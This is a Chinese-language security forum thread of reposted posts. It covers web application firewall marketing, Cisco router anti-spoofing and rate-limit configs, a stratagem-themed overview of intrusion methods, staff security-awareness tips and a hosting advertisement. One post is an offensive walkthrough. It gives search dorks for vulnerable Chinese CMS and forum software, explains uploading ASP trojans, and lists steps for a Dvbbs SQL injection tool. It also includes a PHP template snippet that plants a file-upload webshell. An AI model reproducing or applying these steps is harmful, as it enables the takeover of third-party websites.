qq3250845

以下的文章主要向大家讲述的是从黑客常用攻击手段看WEB应用安全防护，目前Web技术在客户与服务端的广泛利用，导致黑客们越来越侵向于使用各种攻击手法来针对Web应用城进行攻击。

　　即绕过了防火墙等常规防护手段，也使得攻击手段更加简便和多样化，令人防不胜防。

　　黑客们普遍使用Web进行攻击的做法是有原因的：

　　1. 服务器漏洞

　　由于存在漏洞和服务器管理配置错误，Internet Information Server(IIS)和Apache网络服务器经常被黑客用来攻击。

　　2. Web服务器虚拟托管

　　同时托管几个甚至数千个网站的服务器也是恶意攻击的目标。

　　3. 显性/开放式代理

　　被黑客控制的计算机可以被设置为代理服务器，躲避URL过滤对通信的控制，进行匿名上网或者充当非法网站数据流的中间人。

　　4. HTML可以从网页内完全不同的服务器嵌入对象

　　用户可以从特定网站请求浏览网页，只自动地从Google分析服务器等合法网站下载对象;广告服务器;恶意软件下载网站;或者被重新导向至恶意软件网站。

　　5. 普通客户机可能是黑客的试水石

　　Internet Explorer、Firefox等各种浏览区以及Windows操作系统中包含了很多可以被黑客利用的漏洞，特别是在用户经常不及时安装补丁的情况下。黑客会利用这些漏洞在不经用户同意的情况下自动下载恶意软件代码——也称作隐藏式下载。因此他们可能经常变成被黑客控制的傀儡，在访问您网站的同时，给您的Web应用带来风险。

　　6. 各种移动代码、跨站脚本在网站上被广泛使用

　　在浏览器中禁用JavaScript、Java applets、.NET应用、Flash或ActiveX似乎是个好主意，因为它们都会在您的计算机上自动执行脚本或代码，但是如果禁用这些功能，很多网站可能无法浏览。这为编码糟糕的Web应用开启了大门，它们接受用户输入并使用Cookies，就像在跨站点脚本(XSS)中一样。在这种情况下，某些需要访问与其他开放页面的数据(Cookies)Web应用会出现混乱。任何接受用户输入的Web应用(博客、Wikis、评论部分)可能会在无意中接受恶意代码，而这些恶意代码可以被返回给其他用户，除非用户的输入被检查确认为恶意代码。

　　7. 对HTTP和HTTPS的普遍访问

　　访问互联网必须使用Web，所有计算机都可以通过防火墙访问HTTP和HTTPS(TCP端口80和443)。可以假定所有计算机都能够访问外部网络。很多程序都通过HTTP访问互联网，例如IM和P2P软件。此外，这些被劫持的软件打开了发送僵尸网络命令的通道。

　　8.在邮件中采用嵌入式HTML

　　由于SMTP电子邮件网关会在一定程度上限制可以邮件的发送，黑客已经不经常在电子邮件中发送恶意代码。相反，电子邮件中的HTML被用于从Web上获取恶意软件代码，而用户可能根本不知道已经向可以网站发送了请求。

　　从上面这些黑客常用的攻击方向中我们可以看到，为了避免使我们成为以上这些黑客关注的对象，我们需要一种专门针对Web应用进行全面防护的设备，部署一个立体防护的层次，使其能自动智能化地对黑客的这些黑客常用攻击手段进行判别和防护。而非使用一个或多个传统的只有固定策略或固定攻击特征库的被动防护网关来解决。

　　WEB应用防火墙的出现就是为了专门解决这方面难题的，应用防火墙通过执行应用会话内部的请求来处理应用层，它专门保护Web应用通信流和所有相关的应用资源免受利用Web协议或应用程序漏洞发动的攻击。应用防火墙可以阻止将应用行为用于恶意目的的浏览器和HTTP攻击，一些强大的应用防火墙甚至能够模拟代理成为网站服务器接受应用交付，形象的来说相当于给原网站加上了一个安全的绝缘外壳。

　　我们就用一款现在业内比较普遍的梭子鱼WEB应用防火墙来看，它能对下列一般方法无法检测的Web应用层黑客常用攻击手段进行有效的防护：

　　植入恶意脚本

　　Cookie / Session投毒

　　Form表单 / 隐藏域修改

　　缓存溢出

　　参数篡改

　　跨站式脚本攻击

　　强制浏览 / 目录探测

　　Sql注入 / 命令注入

　　数据窃取 / 身份窃取

　　已知漏洞攻击 / Zero Day漏洞攻击

　　应用程序Dos

　　在工作时，梭子鱼WEB应用防火墙具有基于应用层的检测，同时又拥有基于状态的网络防火墙优势的双重特点，

　　?对应用数据录入完整检查、HTTP包头重写、强制HTTP协议合规化，杜绝各种利用协议漏洞的攻击和权限;

　　? 拥有预期数据的完整知识(Complete Knowledge of expected values)系统，防止各种形式的SQL/命令注入，跨站式脚本攻击;

　　? 实时策略生成及执行，根据您的应用程序定义相应的保护策略，而不是千篇一律的厂家预定义防攻击策略，无缝的砌合您的应用程序，不会造成任何应用失真。

　　并且，他能使你的Web应用全面隐身，因为即使黑客再神奇也无法攻击看不见的东西。梭子鱼WEB应用防火墙对外部访问网站进行隐身，可以隐藏真实的Web服务器类型、应用服务器类型、操作系统、版本号、版本更新程度、已知安全漏洞、真实IP地址、内部工作站信息，让黑客看不见，摸不着，探测不到，自然也无从猜测分析和攻击。以下便是一款常用扫描工具扫描经过梭子鱼WEB应用防火墙隐藏的网站的结果。

　　从黑客常用攻击手段看WEB应用防护

　　同时，它还能识别各种爬行探测程序，只允许正常的搜索引擎爬虫进入，抵御黑客爬行程序于门外，让想通过探测确定攻击目标的黑客彻底无门。以上的相关内容就是对从黑客常用攻击手段看WEB应用安全防护的介绍，望你能有所收获。
















更多精彩文章请登录：https://www.sdi23.com/style/info/listnews.asp

qq3250845

1、使用 ip verfy unicast reverse-path 网络接口命令
　　这个功能检查每一个经过路由器的数据包。在路由器的CEF（Cisco Express Forwarding）表该数据包所到达网络接口的所有路由项中，如果没有该数据包源IP地址的路由，路由器将丢弃该数据包。例如，路由器接收到一个源 IP地址为1.2.3.4的数据包，如果CEF路由表中没有为IP地址1.2.3.4提供任 何路由（即反向数据包传输时所需的路由），则路由器会丢弃它。
　　单一地址反向传输路径转发（Unicast Reverse Path Forwarding）在ISP（局端）实现阻止SMURF攻击和其它基于IP地址伪装的攻击。这能够保护网络和客户免受来自互联网其它地方的侵扰。使用 Unicast RPF需要打开路由器的"CEF swithing"或"CEF distributed switching"选项。不需要将输入接口配置为CEF交换（switching）。只要该路由器打开了CEF功能，所有独立的网络接口都可以配置为其它交换（switching）模式。RPF（反向传输路径转发）属于在一个网络接口或子接口上激活的输入端功能，处理路由器接收的数据包。
　　在路由器上打开CEF功能是非常重要的，因为RPF必须依靠CEF。Unicast RPF包含在支持CEF的Cisco IOS 12.0及以上版本中，但不支持Cisco IOS 11.2或11.3版本。
　　2、使用访问控制列表（ACL）过滤RFC 1918中列出的所有地址
　　参考以下例子：

　　interface xy
　　ip access-group 101 in
　　access-list 101 deny ip 10.0.0.0 0.255.255.255 any
　　access-list 101 deny ip 192.168.0.0 0.0.255.255 any
　　access-list 101 deny ip 172.16.0.0 0.15.255.255 any
　　access-list 101 permit ip any any
　　
3、参照RFC 2267，使用访问控制列表（ACL）过滤进出报文
　　参考以下例子：
　　{ISP中心} -- ISP端边界路由器 -- 客户端边界路由器 -- {客户端网络}
　　ISP端边界路由器应该只接受源地址属于客户端网络的通信，而客户端网络则应该只接受源地址未被客户端网络过滤的通信。以下是ISP端边界路由器的访问控制列表（ACL）例子：

　　access-list 190 permit ip {客户端网络} {客户端网络掩码} any
　　access-list 190 deny ip any any [log]
　　interface {内部网络接口} {网络接口号}
　　ip access-group 190 in
　　以下是客户端边界路由器的ACL例子：
　　access-list 187 deny ip {客户端网络} {客户端网络掩码} any
　　access-list 187 permit ip any any
　　access-list 188 permit ip {客户端网络} {客户端网络掩码} any
　　access-list 188 deny ip any any
　　interface {外部网络接口} {网络接口号}
　　ip access-group 187 in
　　ip access-group 188 out
　　
如果打开了CEF功能，通过使用单一地址反向路径转发（Unicast RPF），能够充分地缩短访问控制列表（ACL）的长度以提高路由器性能。为了支持Unicast RPF，只需在路由器完全打开CEF；打开这个功能的网络接口并不需要是CEF交换接口。
　　4、使用CAR（Control Access Rate）限制ICMP数据包流量速率
　　参考以下例子：

　　interface xy
　　rate-limit output access-group 2020 3000000 512000 786000 conform-action
　　transmit exceed-action drop
　　access-list 2020 permit icmp any any echo-reply
　　
请参阅IOS Essential Features 获取更详细资料。
　　5、设置SYN数据包流量速率

　　interface {int}
　　rate-limit output access-group 153 45000000 100000 100000 conform-action
　　transmit exceed-action drop
　　rate-limit output access-group 152 1000000 100000 100000 conform-action
　　transmit exceed-action drop
　　access-list 152 permit tcp any host eq www
　　access-list 153 permit tcp any host eq www established
　　
在实现应用中需要进行必要的修改，替换：
　　45000000为最大连接带宽
　　1000000为SYN flood流量速率的30%到50%之间的数值。
　　burst normal（正常突变）和 burst max（最大突变）两个速率为正确的数值。
　　注意，如果突变速率设置超过30%，可能会丢失许多合法的SYN数据包。使用"show interfaces rate-limit"命令查看该网络接口的正常和过度速率，能够帮助确定合适的突变速率。这个SYN速率限制数值设置标准是保证正常通信的基础上尽可能地小。
　　警告：一般推荐在网络正常工作时测量SYN数据包流量速率，以此基准数值加以调整。必须在进行测量时确保网络的正常工作以避免出现较大误差。
　　另外，建议考虑在可能成为SYN攻击的主机上安装IP Filter等IP过滤工具包。
　　6、搜集证据并联系网络安全部门或机构
　　如果可能，捕获攻击数据包用于分析。建议使用SUN工作站或Linux等高速计算机捕获数据包。常用的数据包捕获工具包括TCPDump和snoop等。基本语法为：

　　tcpdump -i interface -s 1500 -w capture_file
　　snoop -d interface -o capture_file -s 1500
　　
本例中假定MTU大小为1500。如果MTU大于1500，则需要修改相应参数。将这些捕获的数据包和日志作为证据提供给有关网络安全部门或机构。

qq3250845

网络安全的四大误区

qq3250845

😶😶😶😶😶😶😶😶😶😶😶😶😶😶😶😶😶😶😶😶

钧钧

棋牌|捕鱼|魔兽私服|传奇|DNF|奇迹|冒险岛等等等游戏IDC为你解决不必要的烦恼
* 玩游戏想要不卡顿、不掉线？
* 防御性问题：很多游戏客户遭遇到同样的问题，市面上很多游戏客户购买的服务器实际防御，却总是打不到多少就死了，一而再再而三同样被欺骗，无疑是种深沉的打击，从此对选择哪家品质的服务器产生半信半疑。
广东腾正科技是国内有名的IDC公司之一，名下湖南衡阳电信机房、广东惠州电信机房 均为五星级机房，具有超高性能的硬件设备，高级防火墙，超强的电信上层流量清洗设备。拥有专业的技术团队，多年的高防经验，打造最靠谱的防御服务，线路优化品质高，稳定快速！
现推出40-380G防御DDOS攻击服务器，专业的防御策略，全G口服务器，秒防CC等小包攻击！
真实双线路，价格优惠，量大从优！
游戏开区挂站IP段：
183.2.242.1
183.2.247.1
219.135.224.1
183.2.225.1
超级防带流量清洗段：
219.135.228.1 / 14.119.96.1  
适合棋牌游戏、发布网、菠菜等高防网站

业务QQ：2853978336   小君
企业名称: 广东腾正计算机科技有限公司
公司官网：http://www.tzidc.com

qq3250845

黑客入侵的手法包括1)瞒天过海 (2)趁火打劫 (3)无中生有 (4)暗渡陈仓 (5)舌里藏刀 (6)顺手牵羊 (7)供尸还魂 (8)调虎离山 (9)抛砖引玉 (10)湿水摸鱼 (11)远交近攻 (12)偷梁换柱 (13)反客为主。黑客常有连环计，防不胜防，不可不小心。

　　1、瞒天过海，数据驱动攻击

　　当有些表面看来无害的特殊程序在被发送或复制到网络主机上并被执行发起攻击时，就会发生数据驱动攻击。例如:一种数据驱动的攻击可以造成一台主机修改与网络安全有关的文件，从而使黑客下一次更容易入侵该系统。

　　2、趁火打劫，系统文件非法利用

　　UNIX系统可执行文件的目录，如/bin/who可由所有的用户进行读访问。有些用户可以从可执行文件中得到其版本号，从而结合已公布的资料知道系统会具有什么样的漏洞。如通过Telnet指令操行就可以知道Sendmail的版本号。禁止对可执文件的访问虽不能防止黑客对它们的攻击，但至少可以使这种攻击变得更困难。还有一些弱点是由配置文件、访问控制文件和缺省初始化文件产生的。最出名一个例子是:用来安装SunOS Version 4的软件，它创建了一个/rhosts文件，这个文件允许局域网(因特网)上的任何人，从任何地方取得对该主机的超级用户特权。当然，最初这个文件的设置是为了从网上方便地进行安装，而不需超级用户的允许和检查。智者千虑，必有一失，操作系统设计的漏洞为黑客开户了后门，针对WIN95/WIN NT一系列具体攻击就是很好的实例。

　　3、无中生有，伪造信息攻击

　　通过发送伪造的路由信息，构造系统源主机和目标主机的虚假路径，从而使流向目标主机的数据包均经过攻击者的系统主机。这样就给人提供敏感的信息和有用的密码。

　　4、暗渡陈仓，针对信息协议弱点攻击

　　IP地址的源路径选项允许IP数据包自己选择一条通往系统目的主机的路径。设想攻击者试图与防火墙后面的一个不可到达主机A连接。他只需要在送出的请求报文中设置IP源路径选项，使报文有一个目的地址指向防火墙，而最终地址是主机A。当报文到达防火墙时被允许通过，因为它指向防火墙而不是主机A。防火墙的IP层处理该报文的源路径被改变，并发送到内部网上，报文就这样到达了不可到达的主机A。

　　5、笑里藏刀，远端操纵

　　缺省的登录界面(shell scripts)、配置和客户文件是另个问题区域，它们提供了一个简单的方法来配置一个程序的执行环境。这有时会引起远端操纵攻击:在被攻击主机上启动一个可执行程序，该程序显示一个伪造的登录界面。当用户在这个伪装的界面上输入登录信息(用户名、密码等)后，该程序将用户输入的信息传送到攻击者主机，然后关闭界面给出“系统故障”的提示信息，要求用户重新登录。此后才会出现真正的登录界面。在我们能够得到新一代更加完善的操作系统版本之前，类似的攻击仍会发生。防火墙的一个重要作用就是防止非法用户登录到受保护网的主机上。例如可以在进行报文过滤时，禁止外部主机Telnet登录到内部主机上。

　　6、顺手牵羊，利用系统管理员失误攻击

　　网络安全的重要因素之一就是人! 无数历史事实表明:保垒最容易从内攻破。因而人为的失误，如WWW服务器系统的配置差错，普通用户使用户使用权限扩大，这样就给黑客造成了可趁之机。黑客常利用系统管理员的失误，收集攻击信息。如用finger、netstat、arp、mail、grep等命令和一些黑客工具软件。

　　7、借尸还魂，重新发送(REPLAY)攻击

　　收集特定的IP数据包;篡改其数据，然后再一一重新发送，欺骗接收的主机。

　　8、调虎离山，声东击西

　　对ICMP报文的攻击，尽管比较困难，黑客们有时也使用ICMP报文进行攻击。重定向消息可以改变路由列表，路由器可以根据这些消息建议主机走另一条更好的路径。攻击者可以有效地利用重定向消息把连接转向一个不可靠的主机或路径，或使所有报文通过一个不可靠主机来转发。对付这种威肋的方法是对所有ICMP重定向报文进行过滤，有的路由软件可对此进行配置。单纯地抛弃所有重定向报文是不可取的:主机和路由器常常会用到它们，如一个路器发生故障时。

　　9、抛砖引玉，针对源路径选项的弱点攻击

　　强制报文通过一个特定的路径到达目的主机。这样的报文可以用来攻陷防火墙和欺骗主机。一个外部攻击者可以传送一个具有内部主机地址的源路径报文。服务器会相信这个报文并对攻击者发回答报文，因为这是IP的源路径选项要求。对付这种攻击最好的办法是配置好路由器，使它抛弃那些由外部网进来的却声称是内部主机的报文。

　　10、混水摸鱼，以太网广播攻击

　　将以太网接口置为乱模式(promiscuous)，截获局部范围的所有数据包，为我所用。

　　11、远交近攻，跳跃式攻击

　　现在许多因特网上的站点使用UNIX操作系统。黑客们会设法先登录到一台UNIX的主机上，通过该操作系统的漏洞来取得系统特权，然后再以此为据点访问其余主机，这被称为跳跃(Island-hopping)。

　　黑客们在达到目的主机之前往往会这样跳几次。例如一个在美国黑客在进入美联邦调查局的网络之前，可能会先登录到亚洲的一台主机上，再从那里登录到加拿大的一台主机，然后再跳到欧洲，最后从法国的一台主机向联邦调查局发起攻击。这样被攻击网络即使发现了黑客是从何处向自己发起了攻击，管理人员也很难顺藤摸瓜找回去，更何况黑客在取得某台主机的系统特权后，可以在退出时删掉系统日志，把“藤”割断。你只要能够登录到UNIX系统上，就能相对容易成为超级用户，这使得它同时成为黑客和安全专家们的关注点。

　　12、偷梁换柱，窃取TCP协议连接

　　网络互连协议也存在许多易受攻击的地方。而且互连协议的最初产生本来就是为了更方便信息的交流，因此设计者对安全方面很少甚至不去考虑。针对安全协议的分析成为攻击的最历害一招。

　　在几乎所有由UNIX实现的协议族中，存在着一个久为人知的漏洞，这个漏沿使得窃取TCP连接成为可能。当TCP连接正在建立时，服务器用一个含有初始序列号的答报文来确认用户请求。这个序列号无特殊要求，只要是唯一的就可以了。客户端收到回答后，再对其确认一次，连接便建立了。TCP协议规范要求每秒更换序列号25万次。但大多数的UNIX系统实际更换频率远小于此数量，而且下一次更换的数字往往是可以预知的。而黑客正是有这种可预知服务器初始序列号的能力使得攻击可以完成。唯一可以防治这种攻击的方法是使初始序列号的产生更具有随机性。最安全的解决方法是用加密算法产生初始序列号。额外的CPU运算负载对现在的硬件速度来说是可以忽略的。

　　13、反客为主，夺取系统控制权

　　在UNIX系统下，太多的文件是只能由超级用户拥有，而很少是可以由某一类用户所有，这使得管理员必须在root下进行各种操作，这种做法并不是很安全的。黑客攻击首要对象就是root，最常受到攻击的目标是超级用户Password。严格来说，UNIX下的用户密码是没有加密的，它只是作为DES算法加密一个常用字符串的密钥。现在出现了许多用来解密的软件工具，它们利用CPU的高速度究尽式搜索密码。攻击一旦成功，黑客就会成为UNIX系统中的皇帝。因此，将系统中的权利进行三权分立，如果设定邮件系统管理员管理，那么邮件系统邮件管理员可以在不具有超级用户特权的情况下很好地管理邮件系统，这会使系统安全很多。

　　此外，攻击者攻破系统后，常使用金蝉脱壳之计删除系统运行日志，使自己不被系统管理员发现，便以后东山再起。故有用兵之道，以计为首之说，作为网络攻击者会竭尽一切可能的方法，使用各种计谋来攻击目标系统。这就是所谓的三十六计中的连环计。

qq3250845

拒绝成为肉鸡 教你几招让黑客永远抓不到你

qq3250845

一、E时代驿站漏洞
　　百度搜索"E时代驿站"
　　漏洞利用页面 /upload.asp 用老兵直接上传

　　二、沸腾新闻系统上传漏洞
　　搜索：沸腾展望新闻系统[核心：尘缘雅境]授权使用
　　漏洞：没有对空格进行严格的限制。
　　所以，我们直接选定要上传的asp木马，然后在后面加上空格
　　它的上传文件是UploadFaceOK.asp

　　三、尘缘雅境

　　在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
　　到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是,那么就要这样填写,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改

　　四、OFSTAR论坛漏洞利用程序（群共享中）
　　搜索： powered by ofstar.net
　　1:输入管理员用户名
　　2:输入任意一个帖子的路径!
　　3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的！
　　4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台!

　　上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)

　　然后使用提交页面提交``可以直接拿到shell!

<style type='text/css'>
　　</style>
　　<!--
　　EOT;
　　?>-->
　　<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
　　<!--
　　<?php
　　print <<<EOT
　　-->
　　五、破废墟BLOG漏洞
　　百度搜："破废墟 Bloging" ，在后面加上upfile.asp，结果返回
　　DLOG错误：提交的数据来自网站外部 | 返 回
　　或者 您要访问的网页有问题，无法显示。
　　HTTP 500 - 内部服务器错误
　　这说明这个文件是存在的,但是无法正常的访问,其实我们也可以利用
　　直接用老兵上传木马

　　六、动网论坛   

　　1、搜索 Dvbbs Version 7.0.0 Sp2 sql，就会搜索到很多有漏洞 的论坛，选一个，注册一个用户，记住用户名和密码；
　　2、打开软件dvsp2_sql.exe，将要入侵的论坛地址替换掉软件上的地址。这里新手要注意，论坛地址一般是形式，这时你只需要用 xxx.xxx.xxx替代掉软件上的就可以了，但有的 论坛是形式，没有bbs目录，你就要用 xxx.xxx.xxx替代掉软件上的/bbs部分。
　　3、打开软件包里的md59.exe软件，在MD5原码处填入你在论坛注册的密码，点击“16位加密”按钮，在加密密码处就得到了加密过的密码。
　　4、回到dvsp2_sql.exe 软件，在“论坛用户”输入你注册的用户名，“前后台密码”处输入刚转换的加密密码。
　　5、很重要，点击“注入（S）”按钮两次，注意，不多不少，刚好点击两次，别乱点击一通，也不要自己去选择软件上的“SQL”和“SP2”，软件自己会选择，切记！！！
　　6、好了，现在用你注册的用户名重新登陆论坛，你就是管理员身份了。找到论坛“管理”，用用户名gxgl.com 密码你注册的密码登陆，你就是坛主了，可以对整个论坛 进行管理。

qq3250845

人是具有思维和思想的动物，人的很多行动都是由此产生的，而在保护自身方面更是如此。人类对于危险的敏感程度在历史的磨练过程中变得越来越高，这都是为了保护人类最宝贵的生命而产生的。所以换句话说，人的思维或者防护意识是可以培养和锻炼的。

    在长期与威胁人类生命的危险斗争的过程中，人们锻炼出了对于“高热”、“酷冷”等威胁人类威胁的敏感性。但是在信息时代，有一种威胁却是人类天生的“危险意识”所不能察觉到的，那就是对于信息时代人们最宝贵的、来自信息、数据安全方面的威胁。

    面对威胁最快速的反应总能达到最好的防御效果，所以要使自己在信息时代的价值数据不受威胁，培养信息安全意识防护是关键，但同时有了想法、有了警觉却没有应对的方法或者工具，那也是没用的，所以能构筑起信息安全意识和行动的桥梁就是现代信息安全防护技术，而其中要数数据加密技术表现得最为出色。


    应对日益“狡猾”的安全问题 信息安全意识培养也需更“机智”

    姜太公钓鱼，愿者上钩。而网络钓鱼屡见不鲜的原因在于，虽然有很多所谓有见识的员工知道单击不明附件或链接的风险，但仍有许多人乐此不疲，浑然不知自己已经上当。此可谓“好奇害死猫”。

    所以员工的信息安全意识培养势在必行，但要保证培训深入人心，必须要有技巧。以下提供一下几条建议，供参考：

    1、设法使管理部门参与其中。对于管理部门，安全管理者要向其强调良好安全所带来的经济效益，并强调由于减少了数据库遭受损害的风险，必然会减少“宕机”时间和经济损失。相反，如果安全专家无法说服管理者实施强健有效的培训计划，由数据损害所导致的经济损失和补救成本将极大地增加。

    2、有针对性地进行安全培训。在提供安全培训时，对销售人员和收发室的员工是否同等对待？答案应当是否定的，培训应当重视不同员工所面临的特定漏洞。例如，销售员应当接受更多的移动安全培训，因为他们比其他员工更有可能在其工作中使用移动设备和应用。此外，对IT部门进行培训也是非常必要的。

    3、确保安全培训深入人心。安全意识培训不是一种“一蹴而就”的训练。公司至少每年举行一次培训，最好每季度举行一次。最好的方法是，确保培训的连续性。例如，公司不妨设置员工的桌面，使其每周都能够看到不同的安全消息。公司应当围绕着安全构建文化。

    4、讲演技巧很重要。为什么有的人在进行安全培训时观众能够热情洋溢？而有的人在演讲时却令人感觉如同嚼蜡？原因就在于技巧。企业不应当仅仅通知员工必须参加安全培训，而应当用一种鼓动性方法使员工乐于接受培训。例如，如果安全培训者用这样一个题目作为演讲的主题，“黑客怎样窃取你的个人信息？”，如果培训讲师能够以生动的案例来阐释，则其效果显然是事半功倍。在这个问题上，企业不妨向营销人员取经。

    5、解释为什么需要安全策略。虽然在许多主流媒体上已经有许多敏感数据遭受严重损失的案例，很多用户仍不会觉得自己的数据有什么风险。培训者需要借助案例有针对性地向员工展示，黑客是怎样利用其个人数据并最终给公司带来损失的。

    6、向用户展示不遵循安全方案的示例。培训人员不能仅仅告诉用户不要点击可疑的附件或链接，而是展示可疑的链接或附件的样子。通过幻灯向员工强调恶意内容是什么样子。视频比幻灯更有说服力。例如，安全培训者不妨向员工展示数据泄露的危险，警告他们在处理文档时保持谨慎的重要性。

    7、确保用户可以轻松地遵循安全策略。例如，不必强求用户的口令必须非常复杂，以防止其遗忘。如果用户忘记了口令，应该允**重置。

    此外，保持正确的态度。员工们不喜欢你以安全专家的姿态高高在上地教训他们，不要把他们看作傻子。

    意识之后是工具 数据加密是最根本的防护

    意识总是先于行动，但行动总是决定成败的关键。因为光有想法和意识，却没有实际的动作，那什么都是“纸上谈兵”和“空谈”。而在现今复杂的安全形势面前，防护的技术必须具备两点才能应对：一、是本源性。二、灵活性。本源性确保了防护贴近数据本身，从而能达到更实际和更直接的防护效果。而灵活性是确保企业、个人能灵活应对各种安全威胁和安全环境的基础。而如今，能轻松做到这两点的安全技术非国际先进的多模加密技术莫属。

    多模加密技术采用对称算法和非对算法相结合的技术，高质量的算法保证了加密防护的可靠性，同时基于系统内核的透明加密又保证加密的便利性和全面性（加密与格式无关）。同时，多模加密技术最大特点就是可以让用户自主地选择加密模式，从而让个人、企业甚至政府单位在应对多样的防护需求和安全威胁时有了更大的发挥空间。可以说如此高质量且灵活的加密技术是连接安全意识和行动最好的桥梁，同时值得一提的是，这项先进加密技术使用的典型代表正是山丽的防水墙系列。

    人们都说“身随心动”，说明了意识和思维对于处理事务的重要性。而在信息安全防护领域同样如此，只有把信息安全意识和思维提升到了一定高度才能更好的应对各种安全问题。但同时，光有想法却没有行动也是不行的，而能连接信息意识和行动最好的桥梁就是对数据本源有灵活且全面防护的，具有针对性的加密软件！

qq3250845

简述TCP欺骗攻击的两种方法